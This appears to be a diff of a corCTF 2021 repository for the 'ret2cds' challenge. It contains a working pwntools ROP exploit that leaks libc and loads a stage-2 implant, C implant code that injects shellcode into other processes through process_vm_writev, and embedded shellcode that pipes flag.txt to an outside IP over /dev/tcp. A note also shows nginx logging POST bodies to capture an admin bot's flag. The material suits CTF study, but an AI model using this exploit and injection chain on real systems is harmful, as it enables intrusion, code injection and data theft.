BIN
2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar Executable file
View File

Binary file not shown.

3
2021/corctf/ret2cds/challenge/start.sh Normal file
View File

@ -0,0 +1,3 @@
#!/bin/sh
cd /home/ret2cds
while true; do java -jar /opt/nc-java/nc-java.jar ./ret2cds 1337; done

16
2021/corctf/ret2cds/exploit/Makefile Normal file
View File

@ -0,0 +1,16 @@
.PHONY: all clean copy
CC=gcc
OBJCOPY=objcopy
all: implant.bin
clean:
$(RM) *.bin *.elf
implant.bin: implant.elf
$(OBJCOPY) -O binary $< $@
implant.elf: stage2.c stage2.ld
$(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \
-Os -std=gnu11 -Wall -Wextra -o $@ $<

70
2021/corctf/ret2cds/exploit/exploit.py Normal file
View File

@ -0,0 +1,70 @@
from pwn import *
import os
context.arch = 'amd64'
def run():
elf = ELF("../challenge/chall/ret2cds")
rop = ROP(elf)
rop.write(1, elf.got['write'])
print(rop.dump())
libc = ELF("../challenge/chall/libc.so.6")
print(hex(libc.symbols['write']))
# r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
# gdb.attach(r)
# r = remote("localhost", 1337)
r = remote("ret2cds.be.ax", 34485)
try:
r.recvuntil("warden: ")
r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
print(r.recvline())
print(r.recvline())
leak = r.recvline()[1:8]
leak = u64(leak.ljust(8, b'\x00'))
print(hex(leak))
libc_base = leak - libc.symbols['write']
print(hex(libc_base))
libc.address = libc_base
libc_rop = ROP(libc)
libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
libc_rop.read(0, 0x133713370000, 0x10000)
print(libc_rop.dump())
print(libc_rop.chain())
# abuse setcontext lol
# setcontext is always a good function to look for cool gadgets in
# loaded as 0x0
# 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
# 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
# 88 00 00 00
# 001581ec 31 c0 XOR EAX,EAX
# 001581ee c3 RET
fucky_r9_gadget = p64(0x581e1 + libc_base)
# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
pre_rop = ROP(libc)
pre_rop.rdx = 0x402008 - 0x30
r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
os.system("make")
with open("implant.bin", "rb") as f:
shellcode = f.read()
shellcode += b"\x00" * (0x10000 - len(shellcode))
r.send(shellcode)
# stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
r.interactive()
finally:
r.close()
if __name__ == "__main__":
run()

174
2021/corctf/ret2cds/exploit/stage2.c Normal file
View File

@ -0,0 +1,174 @@
// look ma no stdlib
typedef unsigned char uint8_t;
_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size");
typedef unsigned short uint16_t;
_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size");
typedef unsigned int uint32_t;
_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size");
typedef unsigned long long uint64_t;
_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size");
typedef unsigned int size_t;
typedef int ssize_t;
#define NULL ((void*)0x0)
#define pid_t unsigned long
#define true 1
#define false 0
#define SYS_exit 1
#define SYS_read 0
#define SYS_write 1
#define SYS_process_vm_readv 310
#define SYS_process_vm_writev 311
struct iovec {
void *iov_base; /* Starting address */
size_t iov_len; /* Number of bytes to transfer */
};
int main();
void __attribute__((noreturn)) exit(int);
void* memset(void* dst, int val, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = val;
}
return dst;
}
void* memcpy(void* dst, const void* src, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = ((uint8_t*)src)[i];
}
return dst;
}
size_t strlen(const char* s) {
size_t sz = 0;
while(*s) {
s++;
sz++;
}
return sz;
}
extern uint8_t _bss;
extern uint8_t _ebss;
void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() {
// wipe .bss
memset(&_bss, 0, (&_ebss) - (&_bss));
// go to main!
exit(main());
}
ssize_t read(int _fd, void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_read;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
return ret;
}
void write(int _fd, const void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register const void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_write;
asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
}
void __attribute__((noreturn)) exit(int _code) {
register int code asm("rdi") = _code;
register int syscall asm("rax") = SYS_exit;
asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory");
__builtin_unreachable();
}
ssize_t process_vm_readv(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_readv;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
ssize_t process_vm_writev(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_writev;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
////////////////////////////////////////////////////////////////////////////////////////////////////
void print(char* s) {
write(1, s, strlen(s));
}
const char* hex_chars = "0123456789abcdef";
void print_int(unsigned long x) {
char c;
for(int i = 0; i < 64; i+= 4) {
c = hex_chars[(x >> (64 - 4 - i)) & 0xf];
write(1, &c, 1);
}
}
// asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
char* buf = "\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x48\x89\xe7\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x31\x2e\x30\x32\x32\x36\x01\x01\x48\x31\x04\x24\x48\xb8\x34\x34\x2e\x31\x32\x37\x2e\x31\x50\x48\xb8\x2f\x74\x63\x70\x2f\x34\x34\x2e\x50\x48\xb8\x74\x20\x3e\x20\x2f\x64\x65\x76\x50\x48\xb8\x20\x66\x6c\x61\x67\x2e\x74\x78\x50\x48\xb8\x68\x61\x78\x3b\x20\x63\x61\x74\x50\x48\xb8\x63\x68\x20\x2f\x74\x6d\x70\x2f\x50\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x69\x01\x2c\x62\x01\x75\x6e\x74\x48\x31\x04\x24\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x31\xf6\x56\x6a\x15\x5e\x48\x01\xe6\x56\x6a\x1a\x5e\x48\x01\xe6\x56\x6a\x18\x5e\x48\x01\xe6\x56\x48\x89\xe6\x6a\x01\xfe\x0c\x24\x31\xd2\x52\x48\x89\xe2\x6a\x3b\x58\x0f\x05";
char buf2[0x2000];
struct iovec remote_vec = { (void*)0x800000000, 0x2000 };
struct iovec local_vec = { &buf2[0], 0x2000 };
int main() {
print("implant is booted\n");
memset(buf2, 0x90, 0x2000);
memcpy(&buf2[0x2000 - 186], buf, 186);
for (int i = 2; i < 100; i++) {
print("sending to pid:");
print_int(i);
print("\n");
ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0);
if (ret <= 0) {
print("bad ret!: ");
print_int(-ret);
print("\n");
} else {
print("GOOD RET\n");
break;
}
}
print("injection complete\n");
while(true){}
return 120;
}

33
2021/corctf/ret2cds/exploit/stage2.ld Normal file
View File

@ -0,0 +1,33 @@
ENTRY(_start)
MEMORY
{
RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000
}
SECTIONS
{
.text :
{
*(.text.start)
*(.text*)
}
.rodata :
{
*(.rodata*)
}
.data :
{
*(.data*)
}
.bss :
{
_bss = .;
*(.bss*)
*(COMMON)
_ebss = .;
}
}

BIN
2021/corctf/ret2cds/main.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 24 KiB

22
2021/corctf/tricks.md Normal file
View File

@ -0,0 +1,22 @@
# tricks
## phpme: log all submitted post data with nginx
(to capture a flag POSTed by an adminbot)
you can avoid having to write any code and use pure nginx config for this lol
i'm putting this here because i don't wanna write up phpme but this is a cool thing i found out in
the process
```nginx
log_format postdata $request_body;
server {
location /flagzone {
access_log /var/log/nginx/flags.log postdata;
echo_read_request_body;
# ...
}
# ...
}
```